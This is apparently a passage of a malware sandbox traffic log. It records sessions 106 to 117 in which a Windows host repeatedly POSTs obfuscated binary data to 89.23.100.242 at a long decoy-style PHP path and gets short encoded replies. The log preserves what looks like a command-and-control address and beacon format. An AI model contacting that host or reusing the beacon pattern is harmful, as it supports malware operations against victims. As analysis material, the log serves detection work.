Data Raw: 39 38 0d 0a 0f 1e 3a 0f 20 15 3c 1c 32 3c 29 52 3a 01 03 1a 28 20 38 5a 3e 3d 0e 03 2b 23 09 54 2e 06 27 10 21 15 39 1b 3f 1c 3e 19 24 3c 23 0e 32 0d 21 59 0c 13 26 5b 3d 39 31 1e 28 29 20 59 2b 32 22 07 30 33 0d 5b 25 3e 3e 09 37 3c 30 5a 3e 3a 29 55 28 1f 25 57 2c 2a 2c 5f 2a 2f 34 1f 27 1c 2a 57 0c 1f 26 56 22 0c 35 1d 22 21 21 02 33 06 06 0c 30 2b 20 56 24 2c 2b 5a 21 3a 24 01 39 29 28 10 35 07 24 1c 3d 3e 3a 57 22 22 0d 08 2b 16 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98: <2<)R:( 8Z>=+#T.'!9?>$<#2!Y&[=91() Y+2"03[%>>7<0Z>:)U(%W,*,_*/4'*W&V"5"!!30+ V$,+Z!:$9)(5$=>:W""+ Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.4 | 50113 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:05.207210064 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:59:05.564120054 CET | 2544 | OUT | Data Raw: 5c 56 46 52 5e 57 56 52 58 5b 57 56 50 5f 5b 57 55 54 5e 58 54 51 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \VFR^WVRX[WVP_[WUT^XTQQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/23]?-\?]8)-?[8X?;'#4P++*/52?0'_!/Y.9
Jan 10, 2025 07:59:05.944292068 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:06.073045015 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.4 | 50114 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:06.205147982 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:59:06.564106941 CET | 2544 | OUT | Data Raw: 59 50 43 53 5e 5d 56 54 58 5b 57 56 50 52 5b 57 55 55 5e 5b 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YPCS^]VTX[WVPR[WUU^[T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,1$+--_(6(Z/:+#?6$;W+?Y=*1=]$'_!/Y.
Jan 10, 2025 07:59:06.958594084 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:07.092672110 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.4 | 50115 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:07.221076965 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:59:07.579878092 CET | 2544 | OUT | Data Raw: 59 51 43 57 5b 5d 56 5f 58 5b 57 56 50 5e 5b 53 55 5d 5e 5f 54 5a 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YQCW[]V_X[WVP^[SU]^_TZQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,2'X(=%?$X,*"?=,X(8["7;U+4)?:F%X''_!/Y.=
Jan 10, 2025 07:59:07.964337111 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:08.122549057 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.4 | 50116 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:08.253855944 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:59:08.611063004 CET | 2544 | OUT | Data Raw: 5c 56 43 50 5b 5b 56 5e 58 5b 57 56 50 5d 5b 52 55 55 5e 5d 54 59 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \VCP[[V^X[WVP][RUU^]TYQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,20(><54X/:%V<=(Y+(]"?W(0?X*/-%.'$'_!/Y.1
Jan 10, 2025 07:59:09.103215933 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:09.232789040 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                110192.168.2.45011789.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:09.366720915 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:09.720398903 CET | 2544 | OUT | Data Raw: 59 5f 43 55 5e 5a 53 53 58 5b 57 56 50 58 5b 50 55 50 5e 5e 54 50 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CU^ZSSX[WVPX[PUP^^TPQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/"8([:<7,)=W>=+80#$/?3<==2=+0:'_!/Y.%
                                                                                                Jan 10, 2025 07:59:10.283348083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:10.284368992 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0
                                                                                                Jan 10, 2025 07:59:10.284399986 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID: 111 | Source IP: 192.168.2.4 | Source Port: 50118 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:10.410666943 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:10.767287970 CET | 2544 | OUT | Data Raw: 5c 51 43 5f 5b 5b 56 55 58 5b 57 56 50 5e 5b 55 55 57 5e 59 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QC_[[VUX[WVP^[UUW^YTQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/+Y(>-^< X,.(>$_?8"*0+Y*Y9$=(Y$'_!/Y.=


                                                                                                Session ID: 112 | Source IP: 192.168.2.4 | Source Port: 50119 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:10.976708889 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:11.329791069 CET | 2036 | OUT | Data Raw: 5c 54 43 5e 5e 58 56 52 58 5b 57 56 50 52 5b 56 55 52 5e 5b 54 59 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TC^^XVRX[WVPR[VUR^[TYQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/!((^<6?-*1(=$\+(<"47T+#?Z*Y"G1+&*'_!/Y.
                                                                                                Jan 10, 2025 07:59:11.816303968 CET | 374 | IN | HTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 39 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 39 52 20 2b 23 0c 25 06 22 0c 2e 2f 22 09 3f 1e 24 59 29 13 34 00 2b 33 33 53 2c 3f 09 10 20 3b 0b 5e 2b 32 2e 57 24 12 23 0f 26 0d 21 59 0c 13 26 58 2b 03 25 57 3d 2a 24 11 28 32 3e 44 26 23 34 07 33 5b 2d 51 20 11 2f 07 3f 2a 29 19 3c 32 3a 0d 2c 2a 23 07 2a 02 2f 0c 33 36 2a 57 0c 1f 26 1e 22 22 35 51 22 0c 2e 5a 30 38 23 1d 30 01 20 57 31 2f 24 05 21 2a 2b 12 2e 3a 2b 02 23 3d 23 03 2a 07 2e 52 23 22 33 0c 2b 16 20 51 22 0d 22 50 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:59:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989R +#%"./"?$Y)4+33S,? ;^+2.W$#&!Y&X+%W=*$(2>D&#43[-Q /?*)<2:,*#*/36*W&""5Q".Z08#0 W1/$!*+.:+#=#*.R#"3+ Q""P0]Q0


                                                                                                Session ID: 113 | Source IP: 192.168.2.4 | Source Port: 50120 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:11.101484060 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:11.454806089 CET | 2544 | OUT | Data Raw: 59 5f 43 56 5e 5e 56 54 58 5b 57 56 50 5a 5b 57 55 50 5e 5e 54 5f 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CV^^VTX[WVPZ[WUP^^T_QSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,,+2>%;/:( \?$"/?*/2+$'_!/Y.-
                                                                                                Jan 10, 2025 07:59:11.908229113 CET | 225 | IN | HTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 39 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:59:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session ID: 114 | Source IP: 192.168.2.4 | Source Port: 50121 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:12.049834013 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:12.407872915 CET | 2544 | OUT | Data Raw: 5c 55 43 53 5e 5b 56 5e 58 5b 57 56 50 59 5b 56 55 5d 5e 58 54 58 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UCS^[V^X[WVPY[VU]^XTXQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,?X>-^(8X,**+.8_<+#"B((+*<:A23:'_!/Y.!
                                                                                                Jan 10, 2025 07:59:12.808871984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:12.944700003 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID: 115 | Source IP: 192.168.2.4 | Source Port: 50122 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:13.065357924 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:13.423511028 CET | 2536 | OUT | Data Raw: 5c 55 46 57 5b 5b 56 51 58 5b 57 56 50 5b 5b 55 55 5d 5e 5a 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFW[[VQX[WVP[[UU]^ZT[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@8W3Y>-2<P$,:)?.;?;!4Q+U()?2> ^$*'_!/Y.1
                                                                                                Jan 10, 2025 07:59:13.819375038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:13.956799030 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID: 116 | Source IP: 192.168.2.4 | Source Port: 50123 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Jan 10, 2025 07:59:14.079814911 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:14.439152956 CET | 2536 | OUT | Data Raw: 5c 56 46 50 5e 5e 56 52 58 5b 57 56 50 5b 5b 50 55 54 5e 5d 54 58 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFP^^VRX[WVP[[PUT^]TXQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;1#Y>-.>6'89S(=;<+ X#$*34**%$]$'_!/Y.%
                                                                                                Jan 10, 2025 07:59:14.823292017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:14.974802971 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session ID: 117 | Source IP: 192.168.2.4 | Source Port: 50124 | Destination IP: 89.23.100.242 | Destination Port: 80
                                                                                                Timestamp | Bytes transferred | Direction | Data
